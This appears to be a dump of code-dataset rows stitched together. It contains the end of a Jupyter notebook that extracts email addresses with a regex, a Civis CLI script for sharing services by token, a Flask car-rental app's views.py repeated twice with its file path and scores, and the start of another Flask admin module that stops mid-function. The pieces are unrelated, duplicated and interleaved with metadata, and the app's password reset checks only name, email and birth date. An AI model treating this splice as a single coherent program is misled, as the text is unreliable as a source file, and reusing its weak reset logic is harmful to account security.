"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"['<EMAIL>']\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"['<EMAIL>']\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n"
]
}
],
"source": [
"f = open(\"C:\\\\Users\\\\super\\Downloads\\\\Week 1 Test\\\\websiteData.txt\", \"r\", encoding=\"utf8\")\n",
"\n",
"for line in f:\n",
" \n",
" s = line.strip()\n",
" \n",
" \n",
" reg = re.findall(r\"[A-Za-z0-9._%+-]+\"\n",
" r\"@[A-Za-z0-9.-]+\"\n",
" r\"\\.[A-Za-z]{2,4}\", s)\n",
" \n",
" \n",
" print(reg)\n",
" \n",
" \n"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": []
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": []
}
],
"metadata": {
"kernelspec": {
"display_name": "Python 3",
"language": "python",
"name": "python3"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 3
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython3",
"version": "3.8.5"
}
},
"nbformat": 4,
"nbformat_minor": 4
} | 0.39946 | 0.249544 |
import argparse
import civis
def list_services(args):
client = civis.APIClient()
services = client.services.list()
print("List of services:")
for service in services:
print(f"\tID: {service['id']}\tName: {service['name']}")
def share_service(args):
client = civis.APIClient()
service = client.services.get(args.id)
try:
response = client.services.post_tokens(args.id, args.name)
url = f"{service['current_url']}/civis-platform-auth?token={response['token']}"
print(f"Share service id {args.id} with the following URL: {url}")
except civis.base.CivisAPIError as e:
if "Name has already been taken" in str(e):
print(
f"The share name {args.name} is already in use. "
"Please choose another"
)
else:
raise e
def unshare_service(args):
client = civis.APIClient()
tokens = client.services.list_tokens(args.id)
try:
token = next(t for t in tokens if t["name"] == args.name)
client.services.delete_tokens(args.id, token["id"])
print(f"Successfully unshared {args.name}")
except StopIteration:
print(f"Could not find share token with the name {args.name}")
def main():
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers()
list_parser = subparsers.add_parser("list")
list_parser.set_defaults(func=list_services)
share_parser = subparsers.add_parser("share")
share_parser.add_argument("id", type=int, help="The ID of the service to share")
share_parser.add_argument("name", type=str, help="A name to give the share URL")
share_parser.set_defaults(func=share_service)
unshare_parser = subparsers.add_parser("unshare")
unshare_parser.add_argument("id", type=int, help="The ID of the service to unshare")
unshare_parser.add_argument(
"name", type=str, help="The name of the service to unshare"
)
unshare_parser.set_defaults(func=unshare_service)
args = parser.parse_args()
args.func(args)
if __name__ == "__main__":
main() | civis/civis-aqueduct-utils/civis_aqueduct_utils/share.py | import argparse
import civis
def list_services(args):
client = civis.APIClient()
services = client.services.list()
print("List of services:")
for service in services:
print(f"\tID: {service['id']}\tName: {service['name']}")
def share_service(args):
client = civis.APIClient()
service = client.services.get(args.id)
try:
response = client.services.post_tokens(args.id, args.name)
url = f"{service['current_url']}/civis-platform-auth?token={response['token']}"
print(f"Share service id {args.id} with the following URL: {url}")
except civis.base.CivisAPIError as e:
if "Name has already been taken" in str(e):
print(
f"The share name {args.name} is already in use. "
"Please choose another"
)
else:
raise e
def unshare_service(args):
client = civis.APIClient()
tokens = client.services.list_tokens(args.id)
try:
token = next(t for t in tokens if t["name"] == args.name)
client.services.delete_tokens(args.id, token["id"])
print(f"Successfully unshared {args.name}")
except StopIteration:
print(f"Could not find share token with the name {args.name}")
def main():
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers()
list_parser = subparsers.add_parser("list")
list_parser.set_defaults(func=list_services)
share_parser = subparsers.add_parser("share")
share_parser.add_argument("id", type=int, help="The ID of the service to share")
share_parser.add_argument("name", type=str, help="A name to give the share URL")
share_parser.set_defaults(func=share_service)
unshare_parser = subparsers.add_parser("unshare")
unshare_parser.add_argument("id", type=int, help="The ID of the service to unshare")
unshare_parser.add_argument(
"name", type=str, help="The name of the service to unshare"
)
unshare_parser.set_defaults(func=unshare_service)
args = parser.parse_args()
args.func(args)
if __name__ == "__main__":
main() | 0.184217 | 0.116111 |
from flask import Flask, jsonify, render_template, request, redirect, session, url_for
import requests,os,json
from flask_googlemaps import Map
from flask_googlemaps import icons
from app import app, mainEngine, gMap
@app.route('/')
def index():
return render_template("mainlogin.html")
@app.route('/login', methods = ('GET','POST'))
def login():
error = False
if request.method=='POST':
email = request.form['email']
password = request.form['password']
error = True
if mainEngine.login(email, password):
session['email'] = email
return redirect('/customer/home')
return render_template("index.html", error = error, success = False, change = False)
@app.route('/admin', methods = ('GET','POST'))
def adminlogin():
error = False
if request.method=='POST':
username = request.form['username']
password = request.form['password']
error = True
if mainEngine.admin_login(username, password):
session['username'] = username
return redirect('/admin/home')
return render_template("adminLogin.html", error = error)
@app.route('/admin/home')
def admin_home():
return render_template("admin/home.html", username = session['username'] )
@app.route('/admin/carlist')
def admin_car():
cars = mainEngine.getAllCars()
return render_template("admin/carlist.html", cars = cars )
@app.route('/admin/addcar', methods = ('GET','POST'))
def addcar():
success = True
if request.method=='POST':
name = request.form['name']
colour = request.form['color']
description = request.form['description']
capacity = request.form['capacity']
registration_plate = request.form['regPlate']
fuel_type = request.form['fuel']
transmission = request.form['transmission']
type_ = request.form['type']
image = request.form['image']
longitude = request.form['longitude']
latitude = request.form['latitude']
if mainEngine.carRegistrationValidation(registration_plate):
mainEngine.insertCar(name, colour, description, capacity, registration_plate, fuel_type, transmission, type_, longitude, latitude, image)
return redirect("/admin/carlist")
success = False
return render_template("admin/addcar.html", success = success)
@app.route('/admin/editcarpage', methods = ['POST'])
def updatecarpage():
car_id = request.form['id']
car = mainEngine.getCar(car_id)[0]
return render_template('admin/editcar.html', car=car)
@app.route('/admin/edit-car', methods = ['POST'])
def editcar():
success = True
car_id = request.form['id']
car = mainEngine.getCar(car_id)[0]
name = request.form['name']
colour = request.form['color']
description = request.form['description']
capacity = request.form['capacity']
registration_plate = request.form['regPlate']
fuel_type = request.form['fuel']
transmission = request.form['transmission']
type_ = request.form['type']
image = request.form['image']
longitude = request.form['longitude']
latitude = request.form['latitude']
if mainEngine.editCarRegistrationValidation(registration_plate, car_id):
mainEngine.editCar(car_id, name, colour, description, capacity, registration_plate, fuel_type, transmission, type_, longitude, latitude, image)
return redirect("/admin/carlist")
success = False
return render_template("admin/editcar.html", car=car, success = success)
@app.route('/admin/userlist')
def userlist():
customers = mainEngine.getAllCustomers()
addresses = mainEngine.getAllAddresses()
licenses = mainEngine.getAllLicenses()
return render_template("admin/userlist.html", customers = customers, addresses = addresses, licenses = licenses)
@app.route('/register', methods = ('GET', 'POST'))
def register():
error = False
validDOB = True
validLicense = True
if request.method=='POST':
# personal details
fname = request.form['fname']
lname = request.form['lname']
dob = request.form['date']
phone = request.form['phone']
email = request.form['email']
password = request.form['password']
# address details
unit = request.form['unitno']
street = request.form['street']
suburb = request.form['suburb']
state = request.form['state']
postcode = request.form['postcode']
string_address = postcode + ", " + state
# license details
lnumber = request.form['lnumber']
country = request.form['country']
license_state = request.form['license-state']
issue_date = request.form['idate']
expiry_date = request.form['edate']
if mainEngine.check_duplicate_email(email) is False:
if mainEngine.validateDOB(dob) is True:
if mainEngine.validateLicenseDate(issue_date, expiry_date):
mainEngine.register(fname, lname, dob, email, password, phone)
cust_id = mainEngine.getCustomer(email)[0]
url = 'https://maps.googleapis.com/maps/api/geocode/json'
params = {'sensor': 'false', 'address': string_address, 'key': '<KEY>'}
r = requests.get(url, params=params)
results = r.json()['results']
location = results[0]['geometry']['location']
mainEngine.insertAddress(cust_id, unit, street, suburb, state, postcode, location['lat'], location['lng'])
mainEngine.insertLicense(cust_id, lnumber, country, license_state, issue_date, expiry_date)
return render_template("index.html", error = False, success = True, change = False)
else:
validLicense = False
else:
validDOB = False
else:
error = True
return render_template("register.html", error = error, validDOB = validDOB, validLicense = validLicense)
@app.route('/logout')
def logout():
session.clear()
return redirect("/")
@app.route('/customer/home')
def home():
return render_template("customer/home.html", email = session['email'])
@app.route('/customer/booking', methods = ('GET', 'POST'))
def booking():
valid = True
if request.method=='POST':
car_id = request.form['car']
start_date = request.form['sdate']
start_time = request.form['stime']
end_date = request.form['edate']
end_time = request.form['etime']
if mainEngine.validateBookingTime(start_date, start_time, end_date, end_time):
time = mainEngine.getTotalBookingTime(start_date, start_time, end_date, end_time)
cust = mainEngine.getCustomer(session['email'])
plan = cust[7]
cars = mainEngine.getCar(car_id)
cost = 0
if plan == 0:
cost = mainEngine.getTotalBookingCost(start_date, start_time, end_date, end_time, cars[0][10])
else:
cost = mainEngine.getTotalBookingCost(start_date, start_time, end_date, end_time, 15)
return render_template("customer/bookingPayment2.html", cars=cars, start_date=start_date, start_time=start_time, end_date=end_date, end_time=end_time, time=time, cost=cost, success=True)
else:
valid = False
cars = mainEngine.getAvalaibleCars()
mark = []
if cars:
for car in cars:
mark.append((float(car[12]), float(car[11]), car[1]))
gmap = Map(
identifier="gmap",
varname="gmap",
#MELBOURNE COORDINATE
lat=-37.8136,
lng=144.9631,
markers={
icons.dots.blue: mark,
},
style="height:max-500px;max-width:1000px;margin:0;margin-left:auto;margin-right:auto;",
)
return render_template("customer/booking2.html", cars = cars, gmap = gmap, valid = valid)
@app.route('/customer/booking-summary', methods = ['POST'])
def booking_summary():
if request.method=='POST':
car_id = request.form['car']
start_date = request.form['sdate']
start_time = request.form['stime']
end_date = request.form['edate']
end_time = request.form['etime']
time = request.form['time']
cost = request.form['cost']
name = request.form['namecard']
card = request.form['cardnumber']
date = request.form['date']
cvv = request.form['cvv']
cust = mainEngine.getCustomer(session['email'])
if mainEngine.card_validation(name, card, date, cvv):
mainEngine.makeBooking(cust[0], car_id, start_date, start_time, end_date, end_time, time, cost)
mainEngine.setCarUnavalaible(car_id)
return redirect("/customer/ongoing-booking")
else:
cars = mainEngine.getCar(car_id)
return render_template("customer/bookingPayment2.html", cars=cars, start_date=start_date, start_time=start_time, end_date=end_date, end_time=end_time, time=time, cost=cost, success=False)
@app.route('/reset-password', methods = ('GET', 'POST'))
def reset():
invalid = False
diff = False
if request.method=='POST':
fname = request.form['fname']
lname = request.form['lname']
dob = request.form['date']
email = request.form['email']
password = request.form['pass']
confirm_password = request.form['<PASSWORD>']
cust_id = mainEngine.validateCustCredentials(email, fname, lname, dob)
if cust_id is not None:
if mainEngine.confirmPassword(password, confirm_password):
mainEngine.resetPassword(password, cust_id)
return render_template("index.html", error = False, success = False, change = True)
else:
diff = True
else:
invalid = True
return render_template("reset-1.html", invalid = invalid, diff = diff)
@app.route('/customer/ongoing-booking')
def ongoing_booking():
cust_id = mainEngine.getCustomer(session['email'])[0]
bookings = mainEngine.getPersonalOngoingBooking(cust_id)
cars = mainEngine.getAllCars()
return render_template("customer/ongoingBooking.html", bookings = bookings, cars = cars)
@app.route('/customer/booking-history')
def booking_history():
cust_id = mainEngine.getCustomer(session['email'])[0]
bookings = mainEngine.getPersonalBookingHistory(cust_id)
cars = mainEngine.getAllCars()
return render_template("customer/bookingHistory.html", bookings = bookings, cars = cars)
@app.route('/customer/search-car', methods = ('GET', 'POST'))
def search_car():
cars = {}
if request.method=='POST':
column = request.form['column']
search = request.form['search']
cars = mainEngine.searchCars(column, search)
mark = []
if cars:
for car in cars:
mark.append((float(car[12]), float(car[11]), car[1]))
gmap = Map(
identifier="gmap",
varname="gmap",
#MELBOURNE COORDINATE
lat=-37.8136,
lng=144.9631,
markers={
icons.dots.blue: mark,
},
style="height:max-500px;max-width:1000px;margin:0;margin-left:auto;margin-right:auto;",
)
return render_template("/customer/searchCar.html", gmap=gmap, cars= cars)
@app.route('/customer/search-car-near-me', methods = ['POST'])
def search_car_by_location():
cust_id = mainEngine.getCustomer(session['email'])[0]
address = mainEngine.getAddress(cust_id)
car_list = mainEngine.getAvalaibleCars()
cars = mainEngine.distance(car_list, address)
mark = []
if cars:
for car in cars:
mark.append((float(car[12]), float(car[11]), car[1]))
gmap = Map(
identifier="gmap",
varname="gmap",
#MELBOURNE COORDINATE
lat=address[7],
lng=address[8],
markers={
icons.dots.blue: mark,
},
style="height:max-500px;max-width:1000px;margin:0;margin-left:auto;margin-right:auto;",
)
return render_template("/customer/searchCar.html", gmap=gmap, cars= cars)
@app.route('/customer/plan')
def plan():
cust = mainEngine.getCustomer(session['email'])
plan = cust[7]
return render_template("/customer/price.html", plan = plan)
@app.route('/customer/set-plan')
def set_standard():
cust = mainEngine.getCustomer(session['email'])
mainEngine.set_plan(cust[7],cust[0])
return redirect("/customer/plan")
@app.route('/customer/cancel-booking', methods = ['POST'])
def cancel_booking():
booking_id = request.form['booking_id']
mainEngine.cancelBooking(booking_id)
booking = mainEngine.getBooking(booking_id)
mainEngine.setCarAvalaible(booking[0][2])
return redirect("/customer/ongoing-booking")
@app.route('/customer/complete-booking', methods = ['POST'])
def complete_booking():
booking_id = request.form['booking_id']
mainEngine.completeBooking(booking_id)
booking = mainEngine.getBooking(booking_id)
mainEngine.setCarAvalaible(booking[0][2])
return redirect("/customer/booking-history")
@app.route('/admin/delete-car', methods = ['POST'])
def delete_car():
car_id = request.form['car_id']
mainEngine.deleteCar(car_id)
return redirect("/admin/carlist")
@app.route('/customer/plan-summary', methods = ('GET', 'POST'))
def plan_summary():
cust = mainEngine.getCustomer(session['email'])
if request.method=='POST':
name = request.form['namecard']
card = request.form['cardnumber']
date = request.form['date']
cvv = request.form['cvv']
if mainEngine.card_validation(name, card, date, cvv):
mainEngine.set_premium_expiry(cust[0])
else:
return render_template("customer/planPayment2.html", success=False)
cust = mainEngine.getCustomer(session['email'])
if not cust[8] or not mainEngine.validate_premium(cust[8]):
return render_template("customer/planPayment2.html", success=True)
return redirect("/customer/set-plan") | code/app/views.py | from flask import Flask, jsonify, render_template, request, redirect, session, url_for
import requests,os,json
from flask_googlemaps import Map
from flask_googlemaps import icons
from app import app, mainEngine, gMap
@app.route('/')
def index():
return render_template("mainlogin.html")
@app.route('/login', methods = ('GET','POST'))
def login():
error = False
if request.method=='POST':
email = request.form['email']
password = request.form['password']
error = True
if mainEngine.login(email, password):
session['email'] = email
return redirect('/customer/home')
return render_template("index.html", error = error, success = False, change = False)
@app.route('/admin', methods = ('GET','POST'))
def adminlogin():
error = False
if request.method=='POST':
username = request.form['username']
password = request.form['password']
error = True
if mainEngine.admin_login(username, password):
session['username'] = username
return redirect('/admin/home')
return render_template("adminLogin.html", error = error)
@app.route('/admin/home')
def admin_home():
return render_template("admin/home.html", username = session['username'] )
@app.route('/admin/carlist')
def admin_car():
cars = mainEngine.getAllCars()
return render_template("admin/carlist.html", cars = cars )
@app.route('/admin/addcar', methods = ('GET','POST'))
def addcar():
success = True
if request.method=='POST':
name = request.form['name']
colour = request.form['color']
description = request.form['description']
capacity = request.form['capacity']
registration_plate = request.form['regPlate']
fuel_type = request.form['fuel']
transmission = request.form['transmission']
type_ = request.form['type']
image = request.form['image']
longitude = request.form['longitude']
latitude = request.form['latitude']
if mainEngine.carRegistrationValidation(registration_plate):
mainEngine.insertCar(name, colour, description, capacity, registration_plate, fuel_type, transmission, type_, longitude, latitude, image)
return redirect("/admin/carlist")
success = False
return render_template("admin/addcar.html", success = success)
@app.route('/admin/editcarpage', methods = ['POST'])
def updatecarpage():
car_id = request.form['id']
car = mainEngine.getCar(car_id)[0]
return render_template('admin/editcar.html', car=car)
@app.route('/admin/edit-car', methods = ['POST'])
def editcar():
success = True
car_id = request.form['id']
car = mainEngine.getCar(car_id)[0]
name = request.form['name']
colour = request.form['color']
description = request.form['description']
capacity = request.form['capacity']
registration_plate = request.form['regPlate']
fuel_type = request.form['fuel']
transmission = request.form['transmission']
type_ = request.form['type']
image = request.form['image']
longitude = request.form['longitude']
latitude = request.form['latitude']
if mainEngine.editCarRegistrationValidation(registration_plate, car_id):
mainEngine.editCar(car_id, name, colour, description, capacity, registration_plate, fuel_type, transmission, type_, longitude, latitude, image)
return redirect("/admin/carlist")
success = False
return render_template("admin/editcar.html", car=car, success = success)
@app.route('/admin/userlist')
def userlist():
customers = mainEngine.getAllCustomers()
addresses = mainEngine.getAllAddresses()
licenses = mainEngine.getAllLicenses()
return render_template("admin/userlist.html", customers = customers, addresses = addresses, licenses = licenses)
@app.route('/register', methods = ('GET', 'POST'))
def register():
error = False
validDOB = True
validLicense = True
if request.method=='POST':
# personal details
fname = request.form['fname']
lname = request.form['lname']
dob = request.form['date']
phone = request.form['phone']
email = request.form['email']
password = request.form['password']
# address details
unit = request.form['unitno']
street = request.form['street']
suburb = request.form['suburb']
state = request.form['state']
postcode = request.form['postcode']
string_address = postcode + ", " + state
# license details
lnumber = request.form['lnumber']
country = request.form['country']
license_state = request.form['license-state']
issue_date = request.form['idate']
expiry_date = request.form['edate']
if mainEngine.check_duplicate_email(email) is False:
if mainEngine.validateDOB(dob) is True:
if mainEngine.validateLicenseDate(issue_date, expiry_date):
mainEngine.register(fname, lname, dob, email, password, phone)
cust_id = mainEngine.getCustomer(email)[0]
url = 'https://maps.googleapis.com/maps/api/geocode/json'
params = {'sensor': 'false', 'address': string_address, 'key': '<KEY>'}
r = requests.get(url, params=params)
results = r.json()['results']
location = results[0]['geometry']['location']
mainEngine.insertAddress(cust_id, unit, street, suburb, state, postcode, location['lat'], location['lng'])
mainEngine.insertLicense(cust_id, lnumber, country, license_state, issue_date, expiry_date)
return render_template("index.html", error = False, success = True, change = False)
else:
validLicense = False
else:
validDOB = False
else:
error = True
return render_template("register.html", error = error, validDOB = validDOB, validLicense = validLicense)
@app.route('/logout')
def logout():
session.clear()
return redirect("/")
@app.route('/customer/home')
def home():
return render_template("customer/home.html", email = session['email'])
@app.route('/customer/booking', methods = ('GET', 'POST'))
def booking():
valid = True
if request.method=='POST':
car_id = request.form['car']
start_date = request.form['sdate']
start_time = request.form['stime']
end_date = request.form['edate']
end_time = request.form['etime']
if mainEngine.validateBookingTime(start_date, start_time, end_date, end_time):
time = mainEngine.getTotalBookingTime(start_date, start_time, end_date, end_time)
cust = mainEngine.getCustomer(session['email'])
plan = cust[7]
cars = mainEngine.getCar(car_id)
cost = 0
if plan == 0:
cost = mainEngine.getTotalBookingCost(start_date, start_time, end_date, end_time, cars[0][10])
else:
cost = mainEngine.getTotalBookingCost(start_date, start_time, end_date, end_time, 15)
return render_template("customer/bookingPayment2.html", cars=cars, start_date=start_date, start_time=start_time, end_date=end_date, end_time=end_time, time=time, cost=cost, success=True)
else:
valid = False
cars = mainEngine.getAvalaibleCars()
mark = []
if cars:
for car in cars:
mark.append((float(car[12]), float(car[11]), car[1]))
gmap = Map(
identifier="gmap",
varname="gmap",
#MELBOURNE COORDINATE
lat=-37.8136,
lng=144.9631,
markers={
icons.dots.blue: mark,
},
style="height:max-500px;max-width:1000px;margin:0;margin-left:auto;margin-right:auto;",
)
return render_template("customer/booking2.html", cars = cars, gmap = gmap, valid = valid)
@app.route('/customer/booking-summary', methods = ['POST'])
def booking_summary():
if request.method=='POST':
car_id = request.form['car']
start_date = request.form['sdate']
start_time = request.form['stime']
end_date = request.form['edate']
end_time = request.form['etime']
time = request.form['time']
cost = request.form['cost']
name = request.form['namecard']
card = request.form['cardnumber']
date = request.form['date']
cvv = request.form['cvv']
cust = mainEngine.getCustomer(session['email'])
if mainEngine.card_validation(name, card, date, cvv):
mainEngine.makeBooking(cust[0], car_id, start_date, start_time, end_date, end_time, time, cost)
mainEngine.setCarUnavalaible(car_id)
return redirect("/customer/ongoing-booking")
else:
cars = mainEngine.getCar(car_id)
return render_template("customer/bookingPayment2.html", cars=cars, start_date=start_date, start_time=start_time, end_date=end_date, end_time=end_time, time=time, cost=cost, success=False)
@app.route('/reset-password', methods = ('GET', 'POST'))
def reset():
invalid = False
diff = False
if request.method=='POST':
fname = request.form['fname']
lname = request.form['lname']
dob = request.form['date']
email = request.form['email']
password = request.form['pass']
confirm_password = request.form['<PASSWORD>']
cust_id = mainEngine.validateCustCredentials(email, fname, lname, dob)
if cust_id is not None:
if mainEngine.confirmPassword(password, confirm_password):
mainEngine.resetPassword(password, cust_id)
return render_template("index.html", error = False, success = False, change = True)
else:
diff = True
else:
invalid = True
return render_template("reset-1.html", invalid = invalid, diff = diff)
@app.route('/customer/ongoing-booking')
def ongoing_booking():
cust_id = mainEngine.getCustomer(session['email'])[0]
bookings = mainEngine.getPersonalOngoingBooking(cust_id)
cars = mainEngine.getAllCars()
return render_template("customer/ongoingBooking.html", bookings = bookings, cars = cars)
@app.route('/customer/booking-history')
def booking_history():
cust_id = mainEngine.getCustomer(session['email'])[0]
bookings = mainEngine.getPersonalBookingHistory(cust_id)
cars = mainEngine.getAllCars()
return render_template("customer/bookingHistory.html", bookings = bookings, cars = cars)
@app.route('/customer/search-car', methods = ('GET', 'POST'))
def search_car():
cars = {}
if request.method=='POST':
column = request.form['column']
search = request.form['search']
cars = mainEngine.searchCars(column, search)
mark = []
if cars:
for car in cars:
mark.append((float(car[12]), float(car[11]), car[1]))
gmap = Map(
identifier="gmap",
varname="gmap",
#MELBOURNE COORDINATE
lat=-37.8136,
lng=144.9631,
markers={
icons.dots.blue: mark,
},
style="height:max-500px;max-width:1000px;margin:0;margin-left:auto;margin-right:auto;",
)
return render_template("/customer/searchCar.html", gmap=gmap, cars= cars)
@app.route('/customer/search-car-near-me', methods = ['POST'])
def search_car_by_location():
cust_id = mainEngine.getCustomer(session['email'])[0]
address = mainEngine.getAddress(cust_id)
car_list = mainEngine.getAvalaibleCars()
cars = mainEngine.distance(car_list, address)
mark = []
if cars:
for car in cars:
mark.append((float(car[12]), float(car[11]), car[1]))
gmap = Map(
identifier="gmap",
varname="gmap",
#MELBOURNE COORDINATE
lat=address[7],
lng=address[8],
markers={
icons.dots.blue: mark,
},
style="height:max-500px;max-width:1000px;margin:0;margin-left:auto;margin-right:auto;",
)
return render_template("/customer/searchCar.html", gmap=gmap, cars= cars)
@app.route('/customer/plan')
def plan():
cust = mainEngine.getCustomer(session['email'])
plan = cust[7]
return render_template("/customer/price.html", plan = plan)
@app.route('/customer/set-plan')
def set_standard():
cust = mainEngine.getCustomer(session['email'])
mainEngine.set_plan(cust[7],cust[0])
return redirect("/customer/plan")
@app.route('/customer/cancel-booking', methods = ['POST'])
def cancel_booking():
booking_id = request.form['booking_id']
mainEngine.cancelBooking(booking_id)
booking = mainEngine.getBooking(booking_id)
mainEngine.setCarAvalaible(booking[0][2])
return redirect("/customer/ongoing-booking")
@app.route('/customer/complete-booking', methods = ['POST'])
def complete_booking():
booking_id = request.form['booking_id']
mainEngine.completeBooking(booking_id)
booking = mainEngine.getBooking(booking_id)
mainEngine.setCarAvalaible(booking[0][2])
return redirect("/customer/booking-history")
@app.route('/admin/delete-car', methods = ['POST'])
def delete_car():
car_id = request.form['car_id']
mainEngine.deleteCar(car_id)
return redirect("/admin/carlist")
@app.route('/customer/plan-summary', methods = ('GET', 'POST'))
def plan_summary():
cust = mainEngine.getCustomer(session['email'])
if request.method=='POST':
name = request.form['namecard']
card = request.form['cardnumber']
date = request.form['date']
cvv = request.form['cvv']
if mainEngine.card_validation(name, card, date, cvv):
mainEngine.set_premium_expiry(cust[0])
else:
return render_template("customer/planPayment2.html", success=False)
cust = mainEngine.getCustomer(session['email'])
if not cust[8] or not mainEngine.validate_premium(cust[8]):
return render_template("customer/planPayment2.html", success=True)
return redirect("/customer/set-plan") | 0.253584 | 0.043752 |
import os
from flask import current_app, request, flash, render_template, redirect, url_for, jsonify
from flask_login import login_required, current_user
from . import bpAdmin
from project.common.filePreprocess import allowedImage, creatFileName, allowedFileSize, removeFile
from project.common.dataPreprocess import strLength
@bpAdmin.route("/webSetting")
@login_required
def webSetting():
return render_template('admin/webSetting.html')
@bpAdmin.route("/setWebInfo", methods=['POST'])
@login_required
def setWebInfo():
webName = request.form['webName']
